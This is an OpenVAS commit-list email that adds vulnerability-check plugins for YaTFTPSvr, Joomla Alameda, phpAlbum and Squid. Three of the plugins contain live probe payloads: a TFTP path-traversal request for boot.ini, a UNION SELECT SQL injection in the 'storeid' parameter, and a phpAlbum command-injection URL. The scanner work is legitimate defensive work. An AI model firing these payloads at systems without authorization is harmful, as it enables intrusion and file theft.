[Openvas-commits] r11911 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Tue Nov 1 13:24:21 CET 2011


Author: mime
Date: 2011-11-01 13:24:12 +0100 (Tue, 01 Nov 2011)
New Revision: 11911

Added:
   trunk/openvas-plugins/scripts/gb_YaTFTPSvr_50441.nasl
   trunk/openvas-plugins/scripts/gb_joomla_50451.nasl
   trunk/openvas-plugins/scripts/gb_phpalbum_50437.nasl
   trunk/openvas-plugins/scripts/gb_squid_50449.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
   trunk/openvas-plugins/scripts/deb_570_1.nasl
   trunk/openvas-plugins/scripts/deb_571_1.nasl
Log:
Adding new plugins. Fixed Risk according to CVSS.

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2011-11-01 11:52:24 UTC (rev 11910)
+++ trunk/openvas-plugins/ChangeLog	2011-11-01 12:24:12 UTC (rev 11911)
@@ -1,3 +1,15 @@
+2011-11-01  Michael Meyer <michael.meyer at greenbone.net>
+
+	* scripts/gb_squid_50449.nasl,
+	scripts/gb_YaTFTPSvr_50441.nasl,
+	scripts/gb_phpalbum_50437.nasl,
+	scripts/gb_joomla_50451.nasl:
+	Added new plugins.
+
+	* scripts/deb_571_1.nasl,
+	scripts/deb_570_1.nasl:
+	Fixed Risk according to CVSS.
+
 2011-10-31  Michael Meyer <michael.meyer at greenbone.net>
 
 	* scripts/gb_open_site_45709.nasl,

Modified: trunk/openvas-plugins/scripts/deb_570_1.nasl
===================================================================
--- trunk/openvas-plugins/scripts/deb_570_1.nasl	2011-11-01 11:52:24 UTC (rev 11910)
+++ trunk/openvas-plugins/scripts/deb_570_1.nasl	2011-11-01 12:24:12 UTC (rev 11911)
@@ -29,7 +29,7 @@
  script_version("$Revision$");
  script_cve_id("CVE-2004-0599");
  script_tag(name:"cvss_base", value:"5.0");
- script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"risk_factor", value:"Medium");
  name = "Debian Security Advisory DSA 570-1 (libpng)";
  script_name(name);
 
@@ -85,5 +85,5 @@
 }
 
 if(vuln) {
-    security_hole(0);
+    security_warning(0);
 }

Modified: trunk/openvas-plugins/scripts/deb_571_1.nasl
===================================================================
--- trunk/openvas-plugins/scripts/deb_571_1.nasl	2011-11-01 11:52:24 UTC (rev 11910)
+++ trunk/openvas-plugins/scripts/deb_571_1.nasl	2011-11-01 12:24:12 UTC (rev 11911)
@@ -29,7 +29,7 @@
  script_version("$Revision$");
  script_cve_id("CVE-2004-0599");
  script_tag(name:"cvss_base", value:"5.0");
- script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"risk_factor", value:"Medium");
  name = "Debian Security Advisory DSA 571-1 (libpng3)";
  script_name(name);
 
@@ -85,5 +85,5 @@
 }
 
 if(vuln) {
-    security_hole(0);
+    security_warning(0);
 }

Added: trunk/openvas-plugins/scripts/gb_YaTFTPSvr_50441.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_YaTFTPSvr_50441.nasl	2011-11-01 11:52:24 UTC (rev 11910)
+++ trunk/openvas-plugins/scripts/gb_YaTFTPSvr_50441.nasl	2011-11-01 12:24:12 UTC (rev 11911)
@@ -0,0 +1,105 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# YaTFTPSvr TFTP Server Directory Traversal Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103321);
+ script_bugtraq_id(50441);
+ script_version ("$Revision$");
+
+ script_name("YaTFTPSvr TFTP Server Directory Traversal Vulnerability");
+
+desc = "Overview:
+YaTFTPSvr TFTP Server is prone to a directory-traversal vulnerability
+because it fails to sufficiently sanitize user-supplied input.
+
+A remote attacker could exploit this vulnerability using directory-
+traversal strings (such as '../') to upload and download arbitrary
+files outside of the TFTP server root directory. This could help the
+attacker launch further attacks.
+
+YaTFTPSvr 1.0.1.200 is vulnerable; other versions may also be
+affected.
+
+References:
+http://www.securityfocus.com/bid/50441
+http://sites.google.com/site/zhaojieding2/
+http://www.securityfocus.com/archive/1/520302";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-01");
+ script_description(desc);
+ script_summary("Determine if installed YaTFTPSvr is vulnerable");
+ script_category(ACT_ATTACK);
+ script_family("Remote file access");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("find_service.nasl");
+ script_require_ports("Services/udp/tftp");
+ exit(0);
+}
+
+port = get_kb_item("Services/udp/tftp");
+
+if(!port){
+    port = 69;
+}
+
+if(!get_port_state(port))exit(0);
+
+file = "../../../../../../../../../../../../../../boot.ini";
+
+req = '\x00\x01'+file+'\0netascii\0';
+sport = rand() % 64512 + 1024;
+
+ip = forge_ip_packet(ip_hl:5, ip_v:4, ip_tos:0, ip_len:20, ip_off:0, ip_ttl:64, ip_p:IPPROTO_UDP, ip_src: this_host());
+u = forge_udp_packet(ip:ip, uh_sport: sport, uh_dport:port, uh_ulen:8 + strlen(req), data:req);
+
+filter = 'udp and dst port ' + sport + ' and src host ' + get_host_ip() + ' and udp[8:1]=0x00';
+
+for (i = 0; i < 2; i ++) {
+
+  rep = send_packet(u, pcap_active:TRUE, pcap_filter:filter);
+
+  if(rep) {
+
+    data = get_udp_element(udp: rep, element:"data");
+    if (data[0] == '\0' && data[1] == '\x03') {
+
+       c = substr(data, 4);
+
+       if("[boot loader]" >< c) {
+         security_warning(port:port); 
+	 exit(0);
+       }	 
+
+    }  
+
+  }  
+
+}  
+
+exit(0);


Property changes on: trunk/openvas-plugins/scripts/gb_YaTFTPSvr_50441.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision Date

Added: trunk/openvas-plugins/scripts/gb_joomla_50451.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_joomla_50451.nasl	2011-11-01 11:52:24 UTC (rev 11910)
+++ trunk/openvas-plugins/scripts/gb_joomla_50451.nasl	2011-11-01 12:24:12 UTC (rev 11911)
@@ -0,0 +1,86 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Joomla! Alameda Component 'storeid' Parameter SQL Injection Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103323);
+ script_bugtraq_id(50451);
+ script_version ("$Revision$");
+
+ script_name("Joomla! Alameda Component 'storeid' Parameter SQL Injection Vulnerability");
+
+desc = "Overview:
+The Alameda component for Joomla! is prone to an SQL-injection
+vulnerability because it fails to sufficiently sanitize user-supplied
+data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the
+application, access or modify data, or exploit latent vulnerabilities
+in the underlying database.
+
+References:
+http://www.securityfocus.com/bid/50451
+http://www.blueflyingfish.com/alameda/
+http://www.joomla.org";
+
+ script_tag(name:"risk_factor", value:"Medium");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-01");
+ script_description(desc);
+ script_summary("Determine if installed Joomla is vulonerable");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("joomla_detect.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+include("version_func.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!can_host_php(port:port))exit(0);
+
+if(!dir = get_dir_from_kb(port:port,app:"joomla"))exit(0);
+   
+url = string(dir, "/index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+0x4f70656e5641532d53514c2d496e6a656374696f6e2d54657374--"); 
+
+if(http_vuln_check(port:port, url:url,pattern:"OpenVAS-SQL-Injection-Test")) {
+     
+  security_warning(port:port);
+  exit(0);
+
+}
+
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_joomla_50451.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision Date

Added: trunk/openvas-plugins/scripts/gb_phpalbum_50437.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_phpalbum_50437.nasl	2011-11-01 11:52:24 UTC (rev 11910)
+++ trunk/openvas-plugins/scripts/gb_phpalbum_50437.nasl	2011-11-01 12:24:12 UTC (rev 11911)
@@ -0,0 +1,95 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# phpAlbum Multiple Security Vulnerabilities
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103322);
+ script_bugtraq_id(50437);
+ script_version ("$Revision$");
+
+ script_name("phpAlbum Multiple Security Vulnerabilities");
+
+desc = "Overview:
+phpAlbum is prone to an arbitrary-file-download vulnerability,
+multiple cross-site scripting vulnerabilities, and multiple PHP code-
+injection vulnerabilities because it fails to sufficiently sanitize
+user-supplied data.
+
+An attacker can exploit these issues to execute arbitrary script code
+in the browser of an unsuspecting user in the context of the affected
+site, inject and execute arbitrary malicious PHP code, or download
+arbitrary files within the context of the webserver process.
+
+PhpAlbum 0.4.1.16 is vulnerable; other versions may also be affected.
+
+References:
+http://www.securityfocus.com/bid/50437
+http://www.phpalbum.net/dw";
+
+ script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-01");
+ script_description(desc);
+ script_summary("Determine if installed phpAlbum is vulnerable");
+ script_category(ACT_ATTACK);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes", "http_version.nasl");
+ script_require_ports("Services/www", 80);
+ script_exclude_keys("Settings/disable_cgi_scanning");
+ exit(0);
+}
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+   
+port = get_http_port(default:80);
+if(!get_port_state(port))exit(0);
+
+if(!can_host_php(port:port))exit(0);
+
+dirs = make_list("/phpalbum","/phpAlbum", "/phpAlbumnet",cgi_dirs());
+
+foreach dir (dirs) {
+   
+  url = string(dir, "/main.php"); 
+
+  if(http_vuln_check(port:port, url:url, pattern:"<title>phpAlbum.net")) {
+
+    url = string(dir, "/main.php?cmd=phpinfo");
+
+    if(http_vuln_check(port:port, url:url, pattern:"<title>phpinfo")) {
+
+      security_hole(port:port);
+      exit(0);
+   
+    }
+  }
+}
+
+exit(0);
+


Property changes on: trunk/openvas-plugins/scripts/gb_phpalbum_50437.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision Date

Added: trunk/openvas-plugins/scripts/gb_squid_50449.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_squid_50449.nasl	2011-11-01 11:52:24 UTC (rev 11910)
+++ trunk/openvas-plugins/scripts/gb_squid_50449.nasl	2011-11-01 12:24:12 UTC (rev 11911)
@@ -0,0 +1,87 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Squid Proxy Caching Server CNAME Denial of Service Vulnerability
+#
+# Authors:
+# Michael Meyer <michael.meyer at greenbone.net>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(103320);
+ script_bugtraq_id(50449);
+ script_version ("$Revision$");
+
+ script_name("Squid Proxy Caching Server CNAME Denial of Service Vulnerability");
+
+desc = "Overview:
+Squid proxy caching server is prone to a denial-of-service
+vulnerability.
+
+An attacker can exploit this issue to cause an affected application to
+crash, denying service to legitimate users.
+
+Solution:
+Updates are available. Please see the references for more information.
+
+References:
+http://www.securityfocus.com/bid/50449
+http://bugs.squid-cache.org/show_bug.cgi?id=3237
+https://bugzilla.redhat.com/show_bug.cgi?id=750316
+http://permalink.gmane.org/gmane.comp.security.oss.general/6144
+http://www.squid-cache.org/";
+
+ script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"last_modification", value:"$Date$");
+ script_tag(name:"creation_date", value:"2011-11-01");
+ script_description(desc);
+ script_summary("Determine if installed Squid version is vulnerable");
+ script_category(ACT_GATHER_INFO);
+ script_family("Denial of Service");
+ script_copyright("This script is Copyright (C) 2011 Greenbone Networks GmbH");
+ script_dependencies("secpod_squid_detect.nasl");
+ script_require_ports("Services/www","Services/http_proxy",3128,8080);
+ exit(0);
+}
+
+include("http_func.inc");
+include("version_func.inc");
+include("global_settings.inc");
+
+if ( report_paranoia < 2 ) exit(0); # this nvt is prone to FP
+
+port = get_kb_item("Services/http_proxy");
+
+if(!port){
+  exit(0);
+}
+
+if(!vers = get_kb_item(string("www/", port, "/Squid")))exit(0);
+
+if(!isnull(vers)) {
+
+  if(version_is_equal(version:vers, test_version:"3.1.16")) {
+    security_hole(port:port);
+    exit(0);
+  }  
+
+}  
+


Property changes on: trunk/openvas-plugins/scripts/gb_squid_50449.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision Date



More information about the Openvas-commits mailing list